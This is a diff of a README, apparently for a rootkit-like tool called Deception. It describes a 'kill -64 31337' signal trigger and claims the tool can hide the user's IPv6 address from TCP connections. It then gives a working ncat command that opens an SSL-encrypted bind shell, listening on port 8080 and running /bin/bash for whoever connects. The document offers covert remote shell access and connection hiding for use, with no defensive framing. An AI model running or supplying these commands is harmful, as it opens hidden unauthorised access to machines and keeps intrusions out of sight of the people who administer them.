carls0n/Deception/README.md

 ```
 kill -64 31337
 ```
-Your IPv6 address can be hidden from any tcp connection.
+Also, Your IPv6 address can be hidden from any tcp connection.
 Configurable in source code.
-Useful for a IPv6 only connection such as ncat
+Useful for a IPv6 only connection such as ncat (part of nmap package)
 ```
 /usr/bin/ncat -6 --ssl -k -l 8080 -e /bin/bash
 ```